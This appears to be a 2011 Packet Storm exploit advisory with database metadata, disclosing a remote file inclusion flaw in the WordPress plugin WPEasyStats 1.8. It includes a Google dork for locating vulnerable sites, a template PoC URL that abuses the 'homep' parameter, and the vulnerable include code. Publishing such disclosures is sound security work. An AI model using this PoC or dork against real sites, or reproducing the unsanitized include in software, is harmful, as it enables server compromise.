ID PACKETSTORM:105225
Type packetstorm
Reporter Ben Schmidt
Modified 2011-09-19T00:00:00
Description
`# Exploit Title: Wpeasystats Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/wpeasystats
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/wpeasystats/download/
# Version: 1.8
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/wpeasystats/export.php?homep=RFI
---
Vulnerable Code
---
$core = $_GET['homep'].'wp-load.php';
include( $core );
`
{"hash": "f8e28dce482c3466285a691bf9ae4d183f606aa5dd053514c02b4e58b8790bf4", "sourceHref": "https://packetstormsecurity.com/files/download/105225/wpwpeasystats-rfi.txt", "title": "WordPress WPEasyStats 1.8 Remote File Inclusion", "id": "PACKETSTORM:105225", "published": "2011-09-19T00:00:00", "description": "", "modified": "2011-09-19T00:00:00", "sourceData": "`# Exploit Title: Wpeasystats Wordpress plugin RFI \n# Google Dork: inurl:wp-content/plugins/wpeasystats \n# Date: 09/19/2011 \n# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) \n# Software Link: http://wordpress.org/extend/plugins/wpeasystats/download/ \n# Version: 1.8 \n \n--- \nPoC \n--- \nhttp://SERVER/WP_PATH/wp-content/plugins/wpeasystats/export.php?homep=RFI \n \n--- \nVulnerable Code \n--- \n$core = $_GET['homep'].'wp-load.php'; \ninclude( $core ); \n \n`\n", "reporter": "Ben Schmidt", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "b78415c0332c88d5ef8846b3218f0d8b"}, {"key": "modified", "hash": "d2c395e2ff9e2d42d620c449b2be50ee"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "d2c395e2ff9e2d42d620c449b2be50ee"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "7bd6cdac21f3412b9fa1550136a5cba6"}, {"key": "sourceData", "hash": "ebd7a0f155901815f751e5cfdf01bbf8"}, {"key": "sourceHref", "hash": "da81581c1a54331ef24fb84762ac07b9"}, {"key": "title", "hash": "bda98abc7b6378a9944716250b919e2c"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/105225/WordPress-WPEasyStats-1.8-Remote-File-Inclusion.html", "lastseen": "2016-11-03T10:24:42", "viewCount": 0, "enchantments": {"vulnersScore": 7.5}}
{"result": {}}